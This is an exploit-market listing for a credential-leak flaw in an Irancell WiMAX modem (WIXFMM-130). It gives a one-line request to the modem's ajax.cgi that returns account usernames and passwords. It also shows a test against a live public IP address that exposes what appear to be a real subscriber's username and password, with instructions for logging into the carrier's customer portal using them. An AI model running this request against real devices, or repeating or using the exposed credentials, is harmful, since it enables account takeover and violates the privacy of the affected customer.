[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Irancell WIMAX Modem WIXFMM-130 CSRF Accounting User Password Viewer Vulnerability

Author
meisamrce
Risk
[
Security Risk Low
]
0day-ID
0day-ID-26579
Category
web applications
Date add
25-12-2016
Platform
cgi
# Exploit Title: Irancell WIMAX Modem [WIXFMM-130] CSRF Accounting User Password Viewer
# Vendor Homepage: http://wimax.irancell.ir/Portal/Home/
# Version: WIXFMM-130

Exploit :  http://192.168.1.1/ajax.cgi?action=tag_init_wimax_auth.php

Result :

1;1;0;[username]@mtnirancell.com;[password];Identity@mtnirancell.com;0;1;0;1;1;;Identity@irancell.ir;Identity@mtnirancell.com;1;1;0

Login Page : https://ecare.irancell.ir/appmanager/sspportal/login
Choose Language : English
Login Type : WIMAX
Username : username
Password : password

Test : http://2.144.196.10/ajax.cgi?action=tag_init_wimax_auth.php

Result : 

1;1;0;09411344375@mtnirancell.com;RjdHUwiN;984246081023@mtnirancell.com;0;1;0;1;1;;984246081023@irancell.ir;984246081023@mtnirancell.com;1;1;0

Login Url : https://ecare.irancell.ir/appmanager/sspportal/login
Choose Language : English
Login Type : WIMAX
Username : 09411344375
Password : RjdHUwiN


#  0day.today [2024-11-15]  #